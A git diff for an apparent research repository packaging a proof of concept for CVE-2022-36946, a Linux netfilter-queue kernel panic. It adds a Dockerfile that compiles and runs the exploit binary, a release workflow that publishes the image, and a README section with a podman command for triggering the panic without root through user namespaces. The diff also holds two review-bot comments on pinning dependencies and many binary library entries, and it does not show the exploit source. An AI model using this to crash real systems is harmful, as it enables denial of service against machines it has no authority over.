diff --git a/.github/workflows/docker-image.yml b/.github/workflows/docker-image.yml
new file mode 100644
index 0000000..9026c78
--- /dev/null
+++ b/.github/workflows/docker-image.yml
@@ -0,0 +1,53 @@
+name: Create and publish a Docker image
+
+on:
+ release:
+ types:
+ - published
+
+env:
+ REGISTRY: ghcr.io
+ IMAGE_NAME: ${{ github.repository }}
+
+jobs:
+ build-and-push-image:
+ runs-on: ubuntu-latest
+ permissions:
+ contents: read
+ packages: write
+
+ steps:
+ - name: Checkout repository
+ uses: actions/checkout@v3
+
+ - name: Set up QEMU
+ uses: docker/setup-qemu-action@master
+ with:
+ platforms: all
+
+ - name: Set up Docker Buildx
+ id: buildx
+ uses: docker/setup-buildx-action@master
+
+ - name: Log in to the Container registry
+ uses: docker/login-action@v2
+ with:
+ registry: ${{ env.REGISTRY }}
+ username: ${{ github.actor }}
+ password: ${{ secrets.GITHUB_TOKEN }}
+
+ - name: Extract metadata (tags, labels) for Docker
+ id: meta
+ uses: docker/metadata-action@v4
+ with:
+ images: ${{ env.REGISTRY }}/${{ env.IMAGE_NAME }}
+
+ - name: Build and push Docker image
+ uses: docker/build-push-action@v3
+ with:
+ context: .
+ builder: ${{ steps.buildx.outputs.name }}
+ platforms: linux/amd64,linux/arm64
+ push: true
+ tags: ${{ steps.meta.outputs.tags }}
+ labels: ${{ steps.meta.outputs.labels }}
\ No newline at end of file
diff --git a/Dockerfile b/Dockerfile
new file mode 100644
index 0000000..6af30f7
--- /dev/null
+++ b/Dockerfile
@@ -0,0 +1,9 @@
+FROM debian
+
+RUN apt-get update
+RUN apt-get install -y libnetfilter-queue-dev libmnl-dev libnfnetlink-dev iptables gcc
+WORKDIR /exploit
+COPY panic6_podman.c panic6.c
+
+RUN cc panic6.c -o nfpanic -lmnl -lnetfilter_queue
+CMD ["./nfpanic"]
diff --git a/README.md b/README.md
index 0b1a66f..8f2dd6d 100644
--- a/README.md
+++ b/README.md
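Review bot: The `Set up QEMU` and `Set up Docker Buildx` steps in `.github/workflows/docker-image.yml` reference `docker/setup-qemu-action@master` and `docker/setup-buildx-action@master`, a mutable branch, inside a job that holds `packages: write` and logs in to ghcr.io with `GITHUB_TOKEN`. Whatever is on those branches at release time runs with that token, so the published image can change without any change in this repository. Pin both to a full commit SHA, e.g. `uses: docker/setup-qemu-action@<full-commit-sha>  # v2`, or at minimum to a release tag as the other steps already do. `platforms: all` can also be narrowed to `platforms: arm64`, since the build step only targets `linux/amd64,linux/arm64`.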
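Review bot: `FROM debian` in the new Dockerfile resolves to whatever `latest` is at build time, and `apt-get update` sits in a separate layer from `apt-get install`, so a cached index layer can be combined with a later install and two builds of the same release need not match. Pin the base to a release tag or digest, `FROM debian:<release>@sha256:<digest>`, and merge the two steps into `RUN apt-get update && apt-get install -y libnetfilter-queue-dev libmnl-dev libnfnetlink-dev iptables gcc && rm -rf /var/lib/apt/lists/*`. `COPY panic6_podman.c panic6.c` relies on a file that is not added in the part of the commit visible here; it is worth confirming that it is tracked, since the release workflow builds from a clean checkout.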
@@ -22,6 +22,22 @@ So, if user truncates the packet below the header size, this skb\_pull() will re Try it executing [this](/panic6.c) c source code. +# Do we *really* need root...? + +Using linux namespaces, in particular user namespaces (enabled via `kernel.unprivileged_userns_clone=1`), a normal user is able +to create a network namespace, enabling them to use the same kernel primitives that trigger the panic. +This will allow you to use the vulnerability without having root. + +This scenario is not uncommon: for example [podman](https://podman.io/) uses this option to run its (rootless) containers, +and on some distros this option is enabled by default. + +You can also try to execute the exploit without root privileges executing: + +```bash +podman run -it --cap-add NET_ADMIN ghcr.io/pwnzer0tt1/cve-2022-36946 +``` + + # Fix up Fixed in linux kernel 5.19 [view diff](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/diff/net/netfilter/nfnetlink_queue.c?id=v5.19&id2=v5.18) diff --git a/amd64/ip b/amd64/ip new file mode 100644 index 0000000..308f84c Binary files /dev/null and b/amd64/ip differ diff --git a/amd64/iptables b/amd64/iptables new file mode 100644 index 0000000..4b4e809 Binary files /dev/null and b/amd64/iptables differ diff --git a/amd64/ld-linux.so.1 b/amd64/ld-linux.so.1 new file mode 100644 index 0000000..51280a5 Binary files /dev/null and b/amd64/ld-linux.so.1 differ diff --git a/amd64/libbpf.so.1 b/amd64/libbpf.so.1 new file mode 100644 index 0000000..3010507 Binary files /dev/null and b/amd64/libbpf.so.1 differ diff --git a/amd64/libc.so.6 b/amd64/libc.so.6 new file mode 100644 index 0000000..0aeb35f Binary files /dev/null and b/amd64/libc.so.6 differ diff --git a/amd64/libcap.so.2 b/amd64/libcap.so.2 new file mode 100644 index 0000000..2a4c84e Binary files /dev/null and b/amd64/libcap.so.2 differ 
diff --git a/amd64/libelf.so.1 b/amd64/libelf.so.1 new file mode 100644 index 0000000..c0bab2c Binary files /dev/null and b/amd64/libelf.so.1 differ diff --git a/amd64/libgcc_s.so.1 b/amd64/libgcc_s.so.1 new file mode 100644 index 0000000..14c397f Binary files /dev/null and b/amd64/libgcc_s.so.1 differ diff --git a/amd64/libm.so.6 b/amd64/libm.so.6 new file mode 100644 index 0000000..2409d16 Binary files /dev/null and b/amd64/libm.so.6 differ diff --git a/amd64/libmnl.so.0 b/amd64/libmnl.so.0 new file mode 100644 index 0000000..f0b4324 Binary files /dev/null and b/amd64/libmnl.so.0 differ diff --git a/amd64/libnetfilter_queue.so.1 b/amd64/libnetfilter_queue.so.1 new file mode 100644 index 0000000..6666931 Binary files /dev/null and b/amd64/libnetfilter_queue.so.1 differ diff --git a/amd64/libnfnetlink.so.0 b/amd64/libnfnetlink.so.0 new file mode 100644 index 0000000..93b45a7 Binary files /dev/null and b/amd64/libnfnetlink.so.0 differ diff --git a/amd64/libnftnl.so.11 b/amd64/libnftnl.so.11 new file mode 100644 index 0000000..863d4ff Binary files /dev/null and b/amd64/libnftnl.so.11 differ diff --git a/amd64/libstdc++.so.6 b/amd64/libstdc++.so.6 new file mode 100644 index 0000000..6978bfe Binary files /dev/null and b/amd64/libstdc++.so.6 differ diff --git a/amd64/libxtables.so.12 b/amd64/libxtables.so.12 new file mode 100644 index 0000000..3de4015 Binary files /dev/null and b/amd64/libxtables.so.12 differ diff --git a/amd64/libz.so.1 b/amd64/libz.so.1 new file mode 100644 index 0000000..81c44ef Binary files /dev/null and b/amd64/libz.so.1 differ diff --git a/amd64/libzstd.so.1 b/amd64/libzstd.so.1 new file mode 100644 index 0000000..a622519 Binary files /dev/null and b/amd64/libzstd.so.1 differ diff --git a/amd64/nfpanic b/amd64/nfpanic new file mode 100644 index 0000000..e07f077 Binary files /dev/null and b/amd64/nfpanic differ 
diff --git a/amd64/xtables/libarpt_mangle.so b/amd64/xtables/libarpt_mangle.so new file mode 100644 index 0000000..e7d528d Binary files /dev/null and b/amd64/xtables/libarpt_mangle.so differ diff --git a/amd64/xtables/libebt_802_3.so b/amd64/xtables/libebt_802_3.so new file mode 100644 index 0000000..6775f26 Binary files /dev/null and b/amd64/xtables/libebt_802_3.so differ diff --git a/amd64/xtables/libebt_among.so b/amd64/xtables/libebt_among.so new file mode 100644 index 0000000..faa9f69 Binary files /dev/null and b/amd64/xtables/libebt_among.so differ diff --git a/amd64/xtables/libebt_arp.so b/amd64/xtables/libebt_arp.so new file mode 100644 index 0000000..ee611d0 Binary files /dev/null and b/amd64/xtables/libebt_arp.so differ diff --git a/amd64/xtables/libebt_arpreply.so b/amd64/xtables/libebt_arpreply.so new file mode 100644 index 0000000..01613d0 Binary files /dev/null and b/amd64/xtables/libebt_arpreply.so differ diff --git a/amd64/xtables/libebt_dnat.so b/amd64/xtables/libebt_dnat.so new file mode 100644 index 0000000..59766f6 Binary files /dev/null and b/amd64/xtables/libebt_dnat.so differ diff --git a/amd64/xtables/libebt_ip.so b/amd64/xtables/libebt_ip.so new file mode 100644 index 0000000..0f7d40e Binary files /dev/null and b/amd64/xtables/libebt_ip.so differ diff --git a/amd64/xtables/libebt_ip6.so b/amd64/xtables/libebt_ip6.so new file mode 100644 index 0000000..111627e Binary files /dev/null and b/amd64/xtables/libebt_ip6.so differ diff --git a/amd64/xtables/libebt_log.so b/amd64/xtables/libebt_log.so new file mode 100644 index 0000000..38531ed Binary files /dev/null and b/amd64/xtables/libebt_log.so differ diff --git a/amd64/xtables/libebt_mark.so b/amd64/xtables/libebt_mark.so new file mode 100644 index 0000000..e03d0d3 Binary files /dev/null and b/amd64/xtables/libebt_mark.so differ 
diff --git a/amd64/xtables/libebt_mark_m.so b/amd64/xtables/libebt_mark_m.so new file mode 100644 index 0000000..97d63c7 Binary files /dev/null and b/amd64/xtables/libebt_mark_m.so differ diff --git a/amd64/xtables/libebt_nflog.so b/amd64/xtables/libebt_nflog.so new file mode 100644 index 0000000..43d9e30 Binary files /dev/null and b/amd64/xtables/libebt_nflog.so differ diff --git a/amd64/xtables/libebt_pkttype.so b/amd64/xtables/libebt_pkttype.so new file mode 100644 index 0000000..788a199 Binary files /dev/null and b/amd64/xtables/libebt_pkttype.so differ diff --git a/amd64/xtables/libebt_redirect.so b/amd64/xtables/libebt_redirect.so new file mode 100644 index 0000000..3268cd5 Binary files /dev/null and b/amd64/xtables/libebt_redirect.so differ diff --git a/amd64/xtables/libebt_snat.so b/amd64/xtables/libebt_snat.so new file mode 100644 index 0000000..b984ba2 Binary files /dev/null and b/amd64/xtables/libebt_snat.so differ diff --git a/amd64/xtables/libebt_stp.so b/amd64/xtables/libebt_stp.so new file mode 100644 index 0000000..a21cd23 Binary files /dev/null and b/amd64/xtables/libebt_stp.so differ diff --git a/amd64/xtables/libebt_vlan.so b/amd64/xtables/libebt_vlan.so new file mode 100644 index 0000000..486c3eb Binary files /dev/null and b/amd64/xtables/libebt_vlan.so differ diff --git a/amd64/xtables/libip6t_DNPT.so b/amd64/xtables/libip6t_DNPT.so new file mode 100644 index 0000000..bcf8e38 Binary files /dev/null and b/amd64/xtables/libip6t_DNPT.so differ diff --git a/amd64/xtables/libip6t_HL.so b/amd64/xtables/libip6t_HL.so new file mode 100644 index 0000000..29220e2 Binary files /dev/null and b/amd64/xtables/libip6t_HL.so differ diff --git a/amd64/xtables/libip6t_NETMAP.so b/amd64/xtables/libip6t_NETMAP.so new file mode 100644 index 0000000..a058c2c Binary files /dev/null and b/amd64/xtables/libip6t_NETMAP.so differ 
diff --git a/amd64/xtables/libip6t_REJECT.so b/amd64/xtables/libip6t_REJECT.so new file mode 100644 index 0000000..d07b06b Binary files /dev/null and b/amd64/xtables/libip6t_REJECT.so differ diff --git a/amd64/xtables/libip6t_SNPT.so b/amd64/xtables/libip6t_SNPT.so new file mode 100644 index 0000000..46809f4 Binary files /dev/null and b/amd64/xtables/libip6t_SNPT.so differ diff --git a/amd64/xtables/libip6t_ah.so b/amd64/xtables/libip6t_ah.so new file mode 100644 index 0000000..4b68cdd Binary files /dev/null and b/amd64/xtables/libip6t_ah.so differ diff --git a/amd64/xtables/libip6t_dst.so b/amd64/xtables/libip6t_dst.so new file mode 100644 index 0000000..a558444 Binary files /dev/null and b/amd64/xtables/libip6t_dst.so differ diff --git a/amd64/xtables/libip6t_eui64.so b/amd64/xtables/libip6t_eui64.so new file mode 100644 index 0000000..2259234 Binary files /dev/null and b/amd64/xtables/libip6t_eui64.so differ diff --git a/amd64/xtables/libip6t_frag.so b/amd64/xtables/libip6t_frag.so new file mode 100644 index 0000000..0da67d6 Binary files /dev/null and b/amd64/xtables/libip6t_frag.so differ diff --git a/amd64/xtables/libip6t_hbh.so b/amd64/xtables/libip6t_hbh.so new file mode 100644 index 0000000..ad333cd Binary files /dev/null and b/amd64/xtables/libip6t_hbh.so differ diff --git a/amd64/xtables/libip6t_icmp6.so b/amd64/xtables/libip6t_icmp6.so new file mode 100644 index 0000000..2da91a0 Binary files /dev/null and b/amd64/xtables/libip6t_icmp6.so differ diff --git a/amd64/xtables/libip6t_ipv6header.so b/amd64/xtables/libip6t_ipv6header.so new file mode 100644 index 0000000..daef396 Binary files /dev/null and b/amd64/xtables/libip6t_ipv6header.so differ diff --git a/amd64/xtables/libip6t_mh.so b/amd64/xtables/libip6t_mh.so new file mode 100644 index 0000000..b3e83cc Binary files /dev/null and b/amd64/xtables/libip6t_mh.so differ 
diff --git a/amd64/xtables/libip6t_rt.so b/amd64/xtables/libip6t_rt.so new file mode 100644 index 0000000..b71473e Binary files /dev/null and b/amd64/xtables/libip6t_rt.so differ diff --git a/amd64/xtables/libip6t_srh.so b/amd64/xtables/libip6t_srh.so new file mode 100644 index 0000000..820c6cf Binary files /dev/null and b/amd64/xtables/libip6t_srh.so differ diff --git a/amd64/xtables/libipt_CLUSTERIP.so b/amd64/xtables/libipt_CLUSTERIP.so new file mode 100644 index 0000000..5c88bb1 Binary files /dev/null and b/amd64/xtables/libipt_CLUSTERIP.so differ diff --git a/amd64/xtables/libipt_ECN.so b/amd64/xtables/libipt_ECN.so new file mode 100644 index 0000000..d77b301 Binary files /dev/null and b/amd64/xtables/libipt_ECN.so differ diff --git a/amd64/xtables/libipt_NETMAP.so b/amd64/xtables/libipt_NETMAP.so new file mode 100644 index 0000000..49ec5a1 Binary files /dev/null and b/amd64/xtables/libipt_NETMAP.so differ diff --git a/amd64/xtables/libipt_REJECT.so b/amd64/xtables/libipt_REJECT.so new file mode 100644 index 0000000..6b104a2 Binary files /dev/null and b/amd64/xtables/libipt_REJECT.so differ diff --git a/amd64/xtables/libipt_TTL.so b/amd64/xtables/libipt_TTL.so new file mode 100644 index 0000000..96db941 Binary files /dev/null and b/amd64/xtables/libipt_TTL.so differ diff --git a/amd64/xtables/libipt_ULOG.so b/amd64/xtables/libipt_ULOG.so new file mode 100644 index 0000000..c626901 Binary files /dev/null and b/amd64/xtables/libipt_ULOG.so differ diff --git a/amd64/xtables/libipt_ah.so b/amd64/xtables/libipt_ah.so new file mode 100644 index 0000000..eea713b Binary files /dev/null and b/amd64/xtables/libipt_ah.so differ diff --git a/amd64/xtables/libipt_icmp.so b/amd64/xtables/libipt_icmp.so new file mode 100644 index 0000000..ee3415e Binary files /dev/null and b/amd64/xtables/libipt_icmp.so differ 
diff --git a/amd64/xtables/libipt_realm.so b/amd64/xtables/libipt_realm.so new file mode 100644 index 0000000..1511153 Binary files /dev/null and b/amd64/xtables/libipt_realm.so differ diff --git a/amd64/xtables/libxt_AUDIT.so b/amd64/xtables/libxt_AUDIT.so new file mode 100644 index 0000000..c98043e Binary files /dev/null and b/amd64/xtables/libxt_AUDIT.so differ diff --git a/amd64/xtables/libxt_CHECKSUM.so b/amd64/xtables/libxt_CHECKSUM.so new file mode 100644 index 0000000..e3ea7aa Binary files /dev/null and b/amd64/xtables/libxt_CHECKSUM.so differ diff --git a/amd64/xtables/libxt_CLASSIFY.so b/amd64/xtables/libxt_CLASSIFY.so new file mode 100644 index 0000000..07b1632 Binary files /dev/null and b/amd64/xtables/libxt_CLASSIFY.so differ diff --git a/amd64/xtables/libxt_CONNMARK.so b/amd64/xtables/libxt_CONNMARK.so new file mode 100644 index 0000000..1506856 Binary files /dev/null and b/amd64/xtables/libxt_CONNMARK.so differ diff --git a/amd64/xtables/libxt_CONNSECMARK.so b/amd64/xtables/libxt_CONNSECMARK.so new file mode 100644 index 0000000..3286561 Binary files /dev/null and b/amd64/xtables/libxt_CONNSECMARK.so differ diff --git a/amd64/xtables/libxt_CT.so b/amd64/xtables/libxt_CT.so new file mode 100644 index 0000000..8617ddf Binary files /dev/null and b/amd64/xtables/libxt_CT.so differ diff --git a/amd64/xtables/libxt_DNAT.so b/amd64/xtables/libxt_DNAT.so new file mode 100644 index 0000000..b558f83 --- /dev/null +++ b/amd64/xtables/libxt_DNAT.so @@ -0,0 +1 @@ +libxt_NAT.so \ No newline at end of file diff --git a/amd64/xtables/libxt_DSCP.so b/amd64/xtables/libxt_DSCP.so new file mode 100644 index 0000000..4ced6d3 Binary files /dev/null and b/amd64/xtables/libxt_DSCP.so differ diff --git a/amd64/xtables/libxt_HMARK.so b/amd64/xtables/libxt_HMARK.so new file mode 100644 index 0000000..d1924de Binary files /dev/null and b/amd64/xtables/libxt_HMARK.so differ 
diff --git a/amd64/xtables/libxt_IDLETIMER.so b/amd64/xtables/libxt_IDLETIMER.so new file mode 100644 index 0000000..db9ced0 Binary files /dev/null and b/amd64/xtables/libxt_IDLETIMER.so differ diff --git a/amd64/xtables/libxt_LED.so b/amd64/xtables/libxt_LED.so new file mode 100644 index 0000000..ca32cb2 Binary files /dev/null and b/amd64/xtables/libxt_LED.so differ diff --git a/amd64/xtables/libxt_LOG.so b/amd64/xtables/libxt_LOG.so new file mode 100644 index 0000000..3491c51 Binary files /dev/null and b/amd64/xtables/libxt_LOG.so differ diff --git a/amd64/xtables/libxt_MARK.so b/amd64/xtables/libxt_MARK.so new file mode 100644 index 0000000..4fd4615 Binary files /dev/null and b/amd64/xtables/libxt_MARK.so differ diff --git a/amd64/xtables/libxt_MASQUERADE.so b/amd64/xtables/libxt_MASQUERADE.so new file mode 100644 index 0000000..b558f83 --- /dev/null +++ b/amd64/xtables/libxt_MASQUERADE.so @@ -0,0 +1 @@ +libxt_NAT.so \ No newline at end of file diff --git a/amd64/xtables/libxt_NAT.so b/amd64/xtables/libxt_NAT.so new file mode 100644 index 0000000..bd906ac Binary files /dev/null and b/amd64/xtables/libxt_NAT.so differ diff --git a/amd64/xtables/libxt_NFLOG.so b/amd64/xtables/libxt_NFLOG.so new file mode 100644 index 0000000..b461a06 Binary files /dev/null and b/amd64/xtables/libxt_NFLOG.so differ diff --git a/amd64/xtables/libxt_NFQUEUE.so b/amd64/xtables/libxt_NFQUEUE.so new file mode 100644 index 0000000..b13c1c8 Binary files /dev/null and b/amd64/xtables/libxt_NFQUEUE.so differ diff --git a/amd64/xtables/libxt_NOTRACK.so b/amd64/xtables/libxt_NOTRACK.so new file mode 100644 index 0000000..e97684d --- /dev/null +++ b/amd64/xtables/libxt_NOTRACK.so @@ -0,0 +1 @@ +libxt_CT.so \ No newline at end of file diff --git a/amd64/xtables/libxt_RATEEST.so b/amd64/xtables/libxt_RATEEST.so new file mode 100644 index 0000000..f8777c8 Binary files /dev/null and b/amd64/xtables/libxt_RATEEST.so differ 
diff --git a/amd64/xtables/libxt_REDIRECT.so b/amd64/xtables/libxt_REDIRECT.so new file mode 100644 index 0000000..b558f83 --- /dev/null +++ b/amd64/xtables/libxt_REDIRECT.so @@ -0,0 +1 @@ +libxt_NAT.so \ No newline at end of file diff --git a/amd64/xtables/libxt_SECMARK.so b/amd64/xtables/libxt_SECMARK.so new file mode 100644 index 0000000..94e3766 Binary files /dev/null and b/amd64/xtables/libxt_SECMARK.so differ diff --git a/amd64/xtables/libxt_SET.so b/amd64/xtables/libxt_SET.so new file mode 100644 index 0000000..e5d2995 Binary files /dev/null and b/amd64/xtables/libxt_SET.so differ diff --git a/amd64/xtables/libxt_SNAT.so b/amd64/xtables/libxt_SNAT.so new file mode 100644 index 0000000..b558f83 --- /dev/null +++ b/amd64/xtables/libxt_SNAT.so @@ -0,0 +1 @@ +libxt_NAT.so \ No newline at end of file diff --git a/amd64/xtables/libxt_SYNPROXY.so b/amd64/xtables/libxt_SYNPROXY.so new file mode 100644 index 0000000..0f2590a Binary files /dev/null and b/amd64/xtables/libxt_SYNPROXY.so differ diff --git a/amd64/xtables/libxt_TCPMSS.so b/amd64/xtables/libxt_TCPMSS.so new file mode 100644 index 0000000..e52edf3 Binary files /dev/null and b/amd64/xtables/libxt_TCPMSS.so differ diff --git a/amd64/xtables/libxt_TCPOPTSTRIP.so b/amd64/xtables/libxt_TCPOPTSTRIP.so new file mode 100644 index 0000000..1b10e97 Binary files /dev/null and b/amd64/xtables/libxt_TCPOPTSTRIP.so differ diff --git a/amd64/xtables/libxt_TEE.so b/amd64/xtables/libxt_TEE.so new file mode 100644 index 0000000..2e1274a Binary files /dev/null and b/amd64/xtables/libxt_TEE.so differ diff --git a/amd64/xtables/libxt_TOS.so b/amd64/xtables/libxt_TOS.so new file mode 100644 index 0000000..1aa016e Binary files /dev/null and b/amd64/xtables/libxt_TOS.so differ diff --git a/amd64/xtables/libxt_TPROXY.so b/amd64/xtables/libxt_TPROXY.so new file mode 100644 index 0000000..711159c Binary files /dev/null and b/amd64/xtables/libxt_TPROXY.so differ 
diff --git a/amd64/xtables/libxt_TRACE.so b/amd64/xtables/libxt_TRACE.so new file mode 100644 index 0000000..b8fa7b9 Binary files /dev/null and b/amd64/xtables/libxt_TRACE.so differ diff --git a/amd64/xtables/libxt_addrtype.so b/amd64/xtables/libxt_addrtype.so new file mode 100644 index 0000000..5a48197 Binary files /dev/null and b/amd64/xtables/libxt_addrtype.so differ diff --git a/amd64/xtables/libxt_bpf.so b/amd64/xtables/libxt_bpf.so new file mode 100644 index 0000000..0ec9320 Binary files /dev/null and b/amd64/xtables/libxt_bpf.so differ diff --git a/amd64/xtables/libxt_cgroup.so b/amd64/xtables/libxt_cgroup.so new file mode 100644 index 0000000..6ec4af3 Binary files /dev/null and b/amd64/xtables/libxt_cgroup.so differ diff --git a/amd64/xtables/libxt_cluster.so b/amd64/xtables/libxt_cluster.so new file mode 100644 index 0000000..3d82a12 Binary files /dev/null and b/amd64/xtables/libxt_cluster.so differ diff --git a/amd64/xtables/libxt_comment.so b/amd64/xtables/libxt_comment.so new file mode 100644 index 0000000..0b6dc7b Binary files /dev/null and b/amd64/xtables/libxt_comment.so differ diff --git a/amd64/xtables/libxt_connbytes.so b/amd64/xtables/libxt_connbytes.so new file mode 100644 index 0000000..a10c59d Binary files /dev/null and b/amd64/xtables/libxt_connbytes.so differ diff --git a/amd64/xtables/libxt_connlabel.so b/amd64/xtables/libxt_connlabel.so new file mode 100644 index 0000000..d01a4e9 Binary files /dev/null and b/amd64/xtables/libxt_connlabel.so differ diff --git a/amd64/xtables/libxt_connlimit.so b/amd64/xtables/libxt_connlimit.so new file mode 100644 index 0000000..14f02e8 Binary files /dev/null and b/amd64/xtables/libxt_connlimit.so differ diff --git a/amd64/xtables/libxt_conntrack.so b/amd64/xtables/libxt_conntrack.so new file mode 100644 index 0000000..03ac4f1 Binary files /dev/null and b/amd64/xtables/libxt_conntrack.so differ 
diff --git a/amd64/xtables/libxt_cpu.so b/amd64/xtables/libxt_cpu.so new file mode 100644 index 0000000..22c0a6c Binary files /dev/null and b/amd64/xtables/libxt_cpu.so differ diff --git a/amd64/xtables/libxt_dccp.so b/amd64/xtables/libxt_dccp.so new file mode 100644 index 0000000..1162140 Binary files /dev/null and b/amd64/xtables/libxt_dccp.so differ diff --git a/amd64/xtables/libxt_devgroup.so b/amd64/xtables/libxt_devgroup.so new file mode 100644 index 0000000..5f8cefc Binary files /dev/null and b/amd64/xtables/libxt_devgroup.so differ diff --git a/amd64/xtables/libxt_ecn.so b/amd64/xtables/libxt_ecn.so new file mode 100644 index 0000000..e8786ee Binary files /dev/null and b/amd64/xtables/libxt_ecn.so differ diff --git a/amd64/xtables/libxt_esp.so b/amd64/xtables/libxt_esp.so new file mode 100644 index 0000000..d2355ac Binary files /dev/null and b/amd64/xtables/libxt_esp.so differ diff --git a/amd64/xtables/libxt_hashlimit.so b/amd64/xtables/libxt_hashlimit.so new file mode 100644 index 0000000..5ed6d91 Binary files /dev/null and b/amd64/xtables/libxt_hashlimit.so differ diff --git a/amd64/xtables/libxt_helper.so b/amd64/xtables/libxt_helper.so new file mode 100644 index 0000000..42a17cb Binary files /dev/null and b/amd64/xtables/libxt_helper.so differ diff --git a/amd64/xtables/libxt_ipcomp.so b/amd64/xtables/libxt_ipcomp.so new file mode 100644 index 0000000..b380f20 Binary files /dev/null and b/amd64/xtables/libxt_ipcomp.so differ diff --git a/amd64/xtables/libxt_iprange.so b/amd64/xtables/libxt_iprange.so new file mode 100644 index 0000000..7f1f9ed Binary files /dev/null and b/amd64/xtables/libxt_iprange.so differ diff --git a/amd64/xtables/libxt_ipvs.so b/amd64/xtables/libxt_ipvs.so new file mode 100644 index 0000000..33606e3 Binary files /dev/null and b/amd64/xtables/libxt_ipvs.so differ 
diff --git a/amd64/xtables/libxt_length.so b/amd64/xtables/libxt_length.so new file mode 100644 index 0000000..6f86abf Binary files /dev/null and b/amd64/xtables/libxt_length.so differ diff --git a/amd64/xtables/libxt_limit.so b/amd64/xtables/libxt_limit.so new file mode 100644 index 0000000..c7c86ce Binary files /dev/null and b/amd64/xtables/libxt_limit.so differ diff --git a/amd64/xtables/libxt_mac.so b/amd64/xtables/libxt_mac.so new file mode 100644 index 0000000..3af78e4 Binary files /dev/null and b/amd64/xtables/libxt_mac.so differ diff --git a/amd64/xtables/libxt_multiport.so b/amd64/xtables/libxt_multiport.so new file mode 100644 index 0000000..61ac822 Binary files /dev/null and b/amd64/xtables/libxt_multiport.so differ diff --git a/amd64/xtables/libxt_nfacct.so b/amd64/xtables/libxt_nfacct.so new file mode 100644 index 0000000..d299b73 Binary files /dev/null and b/amd64/xtables/libxt_nfacct.so differ diff --git a/amd64/xtables/libxt_osf.so b/amd64/xtables/libxt_osf.so new file mode 100644 index 0000000..5e286f1 Binary files /dev/null and b/amd64/xtables/libxt_osf.so differ diff --git a/amd64/xtables/libxt_owner.so b/amd64/xtables/libxt_owner.so new file mode 100644 index 0000000..69078da Binary files /dev/null and b/amd64/xtables/libxt_owner.so differ diff --git a/amd64/xtables/libxt_physdev.so b/amd64/xtables/libxt_physdev.so new file mode 100644 index 0000000..3900e77 Binary files /dev/null and b/amd64/xtables/libxt_physdev.so differ diff --git a/amd64/xtables/libxt_pkttype.so b/amd64/xtables/libxt_pkttype.so new file mode 100644 index 0000000..22a33fb Binary files /dev/null and b/amd64/xtables/libxt_pkttype.so differ diff --git a/amd64/xtables/libxt_policy.so b/amd64/xtables/libxt_policy.so new file mode 100644 index 0000000..a73c7bd Binary files /dev/null and b/amd64/xtables/libxt_policy.so differ 
diff --git a/amd64/xtables/libxt_quota.so b/amd64/xtables/libxt_quota.so new file mode 100644 index 0000000..03b1f9a Binary files /dev/null and b/amd64/xtables/libxt_quota.so differ diff --git a/amd64/xtables/libxt_recent.so b/amd64/xtables/libxt_recent.so new file mode 100644 index 0000000..7ce05bc Binary files /dev/null and b/amd64/xtables/libxt_recent.so differ diff --git a/amd64/xtables/libxt_rpfilter.so b/amd64/xtables/libxt_rpfilter.so new file mode 100644 index 0000000..7c17c2a Binary files /dev/null and b/amd64/xtables/libxt_rpfilter.so differ diff --git a/amd64/xtables/libxt_sctp.so b/amd64/xtables/libxt_sctp.so new file mode 100644 index 0000000..c9f6bf8 Binary files /dev/null and b/amd64/xtables/libxt_sctp.so differ diff --git a/amd64/xtables/libxt_socket.so b/amd64/xtables/libxt_socket.so new file mode 100644 index 0000000..6be6a5c Binary files /dev/null and b/amd64/xtables/libxt_socket.so differ diff --git a/amd64/xtables/libxt_standard.so b/amd64/xtables/libxt_standard.so new file mode 100644 index 0000000..54860a0 Binary files /dev/null and b/amd64/xtables/libxt_standard.so differ diff --git a/amd64/xtables/libxt_state.so b/amd64/xtables/libxt_state.so new file mode 100644 index 0000000..24417c2 --- /dev/null +++ b/amd64/xtables/libxt_state.so @@ -0,0 +1 @@ +libxt_conntrack.so \ No newline at end of file diff --git a/amd64/xtables/libxt_statistic.so b/amd64/xtables/libxt_statistic.so new file mode 100644 index 0000000..549a26b Binary files /dev/null and b/amd64/xtables/libxt_statistic.so differ diff --git a/amd64/xtables/libxt_string.so b/amd64/xtables/libxt_string.so new file mode 100644 index 0000000..bf48cd4 Binary files /dev/null and b/amd64/xtables/libxt_string.so differ diff --git a/amd64/xtables/libxt_tcp.so b/amd64/xtables/libxt_tcp.so new file mode 100644 index 0000000..fbbe64b Binary files /dev/null and b/amd64/xtables/libxt_tcp.so differ 
diff --git a/amd64/xtables/libxt_time.so b/amd64/xtables/libxt_time.so new file mode 100644 index 0000000..ea8c078 Binary files /dev/null and b/amd64/xtables/libxt_time.so differ diff --git a/amd64/xtables/libxt_u32.so b/amd64/xtables/libxt_u32.so new file mode 100644 index 0000000..da649e4 Binary files /dev/null and b/amd64/xtables/libxt_u32.so differ diff --git a/amd64/xtables/libxt_udp.so b/amd64/xtables/libxt_udp.so new file mode 100644 index 0000000..f5e5c28 Binary files /dev/null and b/amd64/xtables/libxt_udp.so differ diff --git a/arm64/ip b/arm64/ip new file mode 100755 index 0000000..9a8e1e8 Binary files /dev/null and b/arm64/ip differ diff --git a/arm64/iptables b/arm64/iptables new file mode 100755 index 0000000..a794db7 Binary files /dev/null and b/arm64/iptables differ diff --git a/arm64/ld-linux.so.1 b/arm64/ld-linux.so.1 new file mode 100755 index 0000000..df59b82 Binary files /dev/null and b/arm64/ld-linux.so.1 differ diff --git a/arm64/libbpf.so.0 b/arm64/libbpf.so.0 new file mode 100644 index 0000000..c498451 Binary files /dev/null and b/arm64/libbpf.so.0 differ diff --git a/arm64/libbsd.so.0 b/arm64/libbsd.so.0 new file mode 100644 index 0000000..dfdaa56 Binary files /dev/null and b/arm64/libbsd.so.0 differ diff --git a/arm64/libc.so.6 b/arm64/libc.so.6 new file mode 100644 index 0000000..ecf9fe7 Binary files /dev/null and b/arm64/libc.so.6 differ diff --git a/arm64/libcap.so.2 b/arm64/libcap.so.2 new file mode 100644 index 0000000..24c8dde Binary files /dev/null and b/arm64/libcap.so.2 differ diff --git a/arm64/libelf.so.1 b/arm64/libelf.so.1 new file mode 100644 index 0000000..be16836 Binary files /dev/null and b/arm64/libelf.so.1 differ diff --git a/arm64/libmd.so.0 b/arm64/libmd.so.0 new file mode 100644 index 0000000..c2e328c Binary files /dev/null and b/arm64/libmd.so.0 differ diff --git a/arm64/libmnl.so.0 b/arm64/libmnl.so.0 new file mode 100644 index 0000000..618dfc5 Binary files /dev/null and b/arm64/libmnl.so.0 differ 
